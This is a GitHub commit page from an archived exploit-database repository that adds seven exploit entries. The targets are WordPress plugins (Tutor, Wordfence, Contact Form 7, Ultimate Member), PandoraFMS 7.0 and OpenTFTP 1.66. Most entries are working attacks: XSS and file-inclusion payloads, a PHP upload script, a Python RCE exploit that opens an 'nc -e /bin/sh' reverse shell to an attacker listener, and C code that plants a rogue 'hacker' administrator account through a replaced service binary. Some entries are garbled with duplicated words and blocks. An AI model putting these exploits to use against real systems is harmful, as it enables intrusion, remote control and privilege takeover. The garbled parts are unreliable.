This repository has been archived by the owner on Nov 28, 2022. It is now read-only.
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
7 changes to exploits/shellcodes OpenTFTP 1.66 - Local Privilege Escalation Wordpress Plugin tutor.1.5.3 - Local File Inclusion Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting Wordpress Plugin wordfence.7.4.5 - Local File Disclosure Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload PANDORAFMS 7.0 - Authenticated Remote Code Execution WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
- Loading branch information
Offensive Security
committed
Feb 14, 2020
1 parent
875c0a9
commit 21abbd7
Showing
8 changed files
with
316 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion | ||
# Author: mehran feizi | ||
# Category: webapps | ||
# Date: 2020-02-12 | ||
# vendor home page: https://wordpress.org/plugins/tutor/ | ||
|
||
=================================================================== | ||
Vulnerable page: | ||
/instructors.php | ||
=================================================================== | ||
Vulnerable Source: | ||
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); | ||
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; | ||
7: include include $include_file; | ||
requires: | ||
4: if(!empty($sub_page)) | ||
6: if(file_exists($include_file)) | ||
=================================================================== | ||
Exploit: | ||
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] | ||
================================================================================= | ||
contact me: | ||
telegram: @MF0584 | ||
gmail: mehranfeizi13841384@gmail.com | ||
=================================================================== | ||
Vulnerable page: | ||
/instructors.php | ||
=================================================================== | ||
Vulnerable Source: | ||
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); | ||
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; | ||
7: include include $include_file; | ||
requires: | ||
4: if(!empty($sub_page)) | ||
6: if(file_exists($include_file)) | ||
=================================================================== | ||
Exploit: | ||
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] | ||
================================================================================= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting | ||
# Author: mehran feizi | ||
# Category: webapps | ||
# Date: 2020-02-12 | ||
# vendor home page: https://wordpress.org/plugins/tutor/ | ||
|
||
=================================================================== | ||
Vulnerable page: | ||
/Quiz.php | ||
=================================================================== | ||
Vulnerable Source: | ||
473: echo echo $topic_id; | ||
447: $topic_id = sanitize_text_field($_POST['topic_id']); | ||
=================================================================== | ||
Exploit: | ||
localhost/wp-content/plugins/tutor/classes/Quiz.php | ||
$_POST('topic_id') = <script>alert('mehran')</script> | ||
================================================================================= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,14 @@ | ||
# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure | ||
# Author: mehran feizi | ||
# Category: webapps | ||
# Date: 2020-02-12 | ||
# vendor home page: https://wordpress.org/plugins/wordfence/ | ||
|
||
============================================================================== | ||
Vulnerable Source: | ||
5662: readfile readfile($localFile); | ||
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file'])); | ||
================================================================================= | ||
Exploit: | ||
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD] | ||
================================================================================= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload | ||
# Author: mehran feizi | ||
# Category: webapps | ||
# Date: 2020-02-11 | ||
# vendor home page: https://wordpress.org/plugins/contact-form-7/ | ||
|
||
Vulnerable Source: | ||
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file)) | ||
82: $file = $_FILES[$name] : null; | ||
132: $new_file = path_join($uploads_dir, $filename); | ||
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); | ||
121: $uploads_dir = wpcf7_upload_tmp_dir(); | ||
131: $filename = wp_unique_filename($uploads_dir, $filename); | ||
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); | ||
121: $uploads_dir = wpcf7_upload_tmp_dir(); | ||
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); | ||
126: $filename = wpcf7_antiscript_file_name ($filename); | ||
125: $filename = wpcf7_canonicalize ($filename, 'as-is'); | ||
124: $filename = $file['name']; | ||
82: $file = $_FILES[$name] : null; | ||
82: $file = $_FILES[$name] : null; | ||
78: ⇓ function wpcf7_file_validation_filter($result, $tag) | ||
|
||
|
||
Exploit: | ||
<?php | ||
$shahab="file.jpg"; | ||
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php"); | ||
curl_setopt($ch, CURLOPT_POST, true); | ||
curl_setopt($ch, CURLOPT_POSTFIELDS, | ||
array('zip'=>"@$shahab")); | ||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | ||
$result = curl_exec($ch); | ||
curl_close($ch); | ||
print "$result"; | ||
?> | ||
|
||
Location File: | ||
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution | ||
# Date: 2020-02-12 | ||
# Exploit Author: Engin Demirbilek | ||
# Vendor homepage: http://pandorafms.org/ | ||
# Version: 7.0 | ||
# Software link: https://pandorafms.org/features/free-download-monitoring-software/ | ||
# Tested on: CentOS | ||
# CVE: CVE-2020-8947 | ||
|
||
#!/bin/python | ||
''' | ||
PANDORAFMS 7.0 Authenticated Remote Code Execution x4 | ||
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS. | ||
incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port | ||
Author: Engin Demirbilek | ||
Github: github.com/EnginDemirbilek | ||
CVE: CVE-2020-8947 | ||
''' | ||
import requests | ||
import sys | ||
|
||
if len(sys.argv) < 6: | ||
print "Usage: ./exploit.py http://url username password listenerIP listenerPort" | ||
exit() | ||
|
||
url = sys.argv[1] | ||
user = sys.argv[2] | ||
password = sys.argv[3] | ||
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#' | ||
|
||
login = { | ||
'nick':user, | ||
'pass':password, | ||
'login_button':'Login' | ||
} | ||
req = requests.Session() | ||
print "Sendin login request ..." | ||
login = req.post(url+"/pandora_console/index.php?login=1", data=login) | ||
|
||
payload = { | ||
'date':"", | ||
'time':"", | ||
'period':"", | ||
'interval_length':"", | ||
'chart_type':"", | ||
'max_aggregates':"1", | ||
'address_resolution':"0", | ||
'name':"", | ||
'assign_group':"0", | ||
'filter_type':"0", | ||
'filter_id':"0", | ||
'filter_selected':"0", | ||
'ip_dst':payload, | ||
'ip_src':"", | ||
'dst_port':"", | ||
'src_port':"", | ||
'advanced_filter':"", | ||
'aggregate':"dstip", | ||
'router_ip':"", | ||
'output':"bytes", | ||
'draw_button':"Draw" | ||
} | ||
|
||
print "[+] Sendin exploit ..." | ||
|
||
exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={ | ||
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0', | ||
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', | ||
'Accept-Encoding':'gzip, deflate', | ||
'Content-Type':'application/x-www-form-urlencoded'}) | ||
|
||
if exploit.status_code == 200: | ||
print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port." | ||
else: | ||
print "[-] Couldn't send the HTTP request, try again." |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion | ||
# Author : mehran feizi | ||
# Vendor : https://wordpress.org/plugins/ultimate-member/ | ||
# Category : Webapps | ||
# Date : 2020-02-11 | ||
# Vendor home page: https://wordpress.org/plugins/ultimate-member/ | ||
|
||
Vulnerable Page: | ||
/class-admin-upgrade.php | ||
|
||
|
||
Vulnerable Source: | ||
354: if(empty($_POST['pack'])) else | ||
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php'; | ||
|
||
|
||
Exploit: | ||
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php | ||
$_POST('pack')=<script>alert('xss')</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,103 @@ | ||
# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation | ||
# Exploit Author: boku | ||
# Date: 2020-02-12 | ||
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/ | ||
# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download | ||
# Version: 1.66 | ||
# Tested On: Windows 10 (32-bit) | ||
|
||
# About: | ||
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, | ||
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." | ||
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/ | ||
|
||
# Vulnerability Details: | ||
# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. | ||
# This allows a low-privilge, local attacker to escalate their permissions to Administrator; | ||
# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. | ||
# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the | ||
# default installation. After the attacker has planted the malicious binary, the code will | ||
# be executed with System priviledges on the next boot of the windows device. See PoC below for details. | ||
|
||
## Service Information (there is also an Unquoted Service Path) | ||
C:\>sc qc TFTPServer | ||
SERVICE_NAME: TFTPServer | ||
TYPE : 10 WIN32_OWN_PROCESS | ||
START_TYPE : 2 AUTO_START | ||
ERROR_CONTROL : 0 IGNORE | ||
BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe | ||
LOAD_ORDER_GROUP : | ||
TAG : 0 | ||
DISPLAY_NAME : Open TFTP Single Port Server | ||
DEPENDENCIES : | ||
SERVICE_START_NAME : LocalSystem | ||
|
||
## Insecure Folder Permission | ||
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F | ||
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F | ||
BUILTIN\Users:(OI)(CI)(ID)R | ||
NT AUTHORITY\Authenticated Users:(ID)C | ||
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C | ||
|
||
## Insecure File/Service Permission | ||
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F) | ||
NT AUTHORITY\SYSTEM:(I)(F) | ||
BUILTIN\Users:(I)(RX) | ||
NT AUTHORITY\Authenticated Users:(I)(M) | ||
|
||
## Local Privilege Escalation Proof of Concept | ||
#0. Download & install Open TFTP Server v1.66 | ||
|
||
#1. Create low privileged user & change to the user | ||
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full" | ||
User name lowPrivUser | ||
Local Group Memberships *Users | ||
Global Group memberships *None | ||
C:\>whoami | ||
mycomputer\lowprivuser | ||
|
||
#2. Move the Service EXE to a new name | ||
C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe | ||
1 file(s) moved. | ||
|
||
#3. Create malicious binary on kali linux | ||
1) Download dependencies | ||
root@kali# apt install gcc-mingw-w64-i686 wine64 -y | ||
2) Add Admin User C Code | ||
root@kali# cat addAdmin.c | ||
#include<windows.h> | ||
int main(void){ | ||
system("net user hacker mypassword /add"); | ||
system("net localgroup Administrators hacker /add"); | ||
WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0); | ||
return 0; | ||
} | ||
3) Compile Code | ||
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe | ||
|
||
#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host | ||
|
||
#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder | ||
C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\ | ||
1 file(s) moved. | ||
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe" | ||
02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe | ||
02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe | ||
|
||
#6. Reboot the Computer | ||
|
||
#7. Look at that new Admin | ||
C:\Users\lowPrivUser>net users hacker | findstr "Local name active" | ||
User name hacker | ||
Account active Yes | ||
Local Group Memberships *Administrators *Users | ||
|
||
C:\Users\lowPrivUser>net localgroup Administrators | ||
Alias name Administrators | ||
Comment Administrators have complete and unrestricted access to the computer/domain | ||
|
||
Members | ||
------------------------------------------------------------------------------- | ||
Administrator | ||
boku | ||
hacker |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters